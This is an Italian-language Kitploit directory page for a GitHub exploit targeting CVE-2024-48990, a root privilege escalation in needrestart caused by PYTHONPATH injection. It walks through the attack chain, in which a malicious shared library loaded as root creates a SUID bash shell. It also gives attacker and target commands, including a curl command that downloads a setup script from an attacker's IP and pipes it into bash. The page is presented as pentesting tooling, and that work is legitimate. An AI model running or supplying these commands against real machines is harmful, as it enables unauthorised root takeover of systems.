Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-48990 — Exploit completo per la shell root setuid di needsrestart | Kitploit
Strumenti/GitHubGitHub/mladicstefan/cve-2024-48990
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingRed TeamingSviluppo Payload
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

Exploit completo per la shell root setuid di needsrestart

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-48990 Exploit

Escalation locale dei privilegi in needrestart < 3.8 tramite iniezione di PYTHONPATH.

Come Funziona

  1. needrestart viene eseguito come root e scansiona tutti i processi
  2. Trova il nostro processo Python, legge PYTHONPATH=/tmp/.m da /proc/[pid]/environ
  3. Esegue Python come root con il nostro PYTHONPATH dannoso
  4. L'import di Python carica /tmp/.m/importlib/__init__.so (la nostra libreria dannosa)
  5. Il costruttore nel .so viene eseguito come root prima ancora che Python parta
  6. Crea una bash SUID in /tmp/rootbash
  7. Esegui /tmp/rootbash -p per una shell root

Punto chiave: needrestart si fida delle variabili d'ambiente provenienti da processi non privilegiati e le usa quando esegue gli interpreti come root.

Utilizzo

Attaccante:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

Bersaglio:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

Il processo e.py dovrebbe restare in attesa e avviare una root una volta eseguito quanto segue da un secondo terminale:

root@kitploit:~
sudo needsrestard

il primo terminale avvierà una shell root

Crediti

Qualys Threat Research Unit - CVE-2024-48990

Scarica lo strumento